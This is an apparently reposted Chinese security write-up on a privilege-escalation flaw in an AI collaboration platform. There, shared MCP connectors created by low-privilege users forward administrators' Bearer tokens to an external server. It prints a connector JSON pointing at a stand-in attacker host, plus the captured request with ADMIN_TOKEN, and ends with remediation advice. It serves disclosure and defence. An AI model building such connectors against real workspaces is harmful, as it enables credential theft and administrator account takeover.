0177.通过恶意共享连接器窃取存储凭证,导致管理员账户被盗用

admin 2026-07-02 05:23:25 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 该文档分析了一个AI协作平台中因连接器共享功能设计缺陷导致的权限提升漏洞。低权限用户可创建指向攻击者服务器的共享连接器,当管理员与之交互并输入Bearer令牌时,平台后端会自动将凭证转发至攻击者控制的端点,导致管理员账户被盗用。漏洞根源在于缺乏信任验证与凭证转发控制。建议限制共享连接器创建权限、实施审批流程、防止凭证自动转发并添加安全警告。 综合评分: 86 文章分类: 漏洞分析,红队,渗透测试


cover_image

0177.通过恶意共享连接器窃取存储凭证,导致管理员账户被盗用

原创

black black

Rsec

2026年6月30日 18:12 贵州

在小说阅读器读本章

去阅读

本文章仅用网络安全研究学习,请勿使用相关技术进行违法犯罪活动。

声明:本文搬运自互联网,如你是原作者,请联系我们!

类型:账户接管

介绍

在评估现代 AI 协作平台的安全性时,我发现了一个权限提升漏洞,该漏洞允许低权限的工作区成员捕获管理员 Bearer 令牌并获得有效的管理员级别访问权限。

这个问题源于连接器共享功能的设计缺陷,其中用户创建的连接器受到特权用户的信任,并允许将敏感凭据转发到任意外部服务器。

漏洞概要

该平台允许工作区成员创建可在整个工作区共享的自定义 MCP 连接器。

连接器创建者可以指定:

  • 任意外部服务器
  • 自定义身份验证方案
  • 工作区范围内的可见性

当管理员与恶意连接器交互并输入凭据时,平台后端会自动将这些凭据传输到攻击者控制的端点。

这导致了凭证被盗和权限提升。

根本原因分析

该漏洞是由多种安全设计问题共同造成的:

  1. 低权限用户可以创建共享连接器。
  2. 连接器可以指向任意外部域。
  3. 管理员可以看到共享连接器。
  4. 管理员提供的身份验证凭据会自动转发到外部服务器。
  5. 连接器创建者和特权用户之间不存在信任验证。

这些问题共同为低权限用户获取管理员凭据提供了途径。

技术细节

创建连接器

低权限用户也可以创建具有工作区可见性的连接器:

{"name": "Research Assistant","title": "Research Assistant","description": "AI Connector","visibility": "shared_workspace","server": "https://attacker-controlled-server.example","auth_scheme": {"type": "http","name": "Authorization","scheme": "Bearer"}}

之后,所有工作区用户(包括管理员)都可以使用该连接器。

利用步骤

步骤 1 — 创建恶意共享连接器

攻击者创建了一个连接器,该连接器配置为使用攻击者控制的服务器和 Bearer 身份验证方案。

因为连接器上标有:

{"visibility": "shared_workspace"}

它在整个工作空间中都清晰可见。

步骤 2 — 管理员与连接器交互

管理员打开共享连接器并尝试进行身份验证。

界面会显示类似于以下内容的凭据提示:

请在下方注册您的凭证信息。

管理员认为连接器是合法的,于是提交了自己的 Bearer 令牌。

第三步——凭证泄露

提交后,后端会自动将提供的凭据转发到连接器端点。

攻击者收到的示例请求:

POST / HTTP/1.1User-Agent: MCPClientAuthorization: Bearer ADMIN_TOKENContent-Type: application/json
{"method": "initialize","params": {"protocolVersion": "REDACTED","capabilities": {},"clientInfo": {"name": "mcp","version": "REDACTED"}},"jsonrpc": "2.0","id": 0}

攻击者现在拥有有效的管理员 Bearer 令牌。

影响

成功利用该漏洞可能允许低权限用户:

  • 将权限提升至管理员级别
  • 访问特权工作区功能
  • 修改组织设置

创建或删除集成

  • 访问受保护的资源
  • 执行行政操作
  • 完全妥协工作区集成

在受影响的环境中,该漏洞可能导致整个工作区遭到破坏。

为什么这个漏洞值得关注

与传统的网络钓鱼攻击不同,受害者不会离开平台。

管理员正在与合法的平台功能进行交互,而平台后端本身却将凭据转发到攻击者控制的端点。

这会显著增加信任度,并提高成功利用的可能性。

安全建议

  • 限制共享连接器的创建:只有受信任的用户或管理员才能发布工作区范围内的连接器。
  • 实施审批工作流程:新共享的连接器在对其他用户可见之前,应经过管理员审核。
  • 防止凭证转发:敏感凭证绝不应自动转发给不受信任的第三方服务器。
  • 添加安全警告:当凭证将被传输到外部域时,应明确告知用户。
  • 域名验证:连接器使用外部端点之前,需要进行所有权验证或列入允许列表。
  • 区分信任边界:在管理员工作流程中,绝不应信任用户生成的内容。

经验教训

该漏洞表明,当信任边界没有得到严格执行时,协作和集成功能可能会成为强大的权限提升途径。

允许低权限用户创建能够收集管理员凭据的共享集成,为管理员权限的泄露提供了直接途径。

围绕集成的安全控制措施的设计应假定任何用户生成的连接器都可能是恶意的。


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:Rsec black black《0177.通过恶意共享连接器窃取存储凭证,导致管理员账户被盗用》

评论:0   参与:  0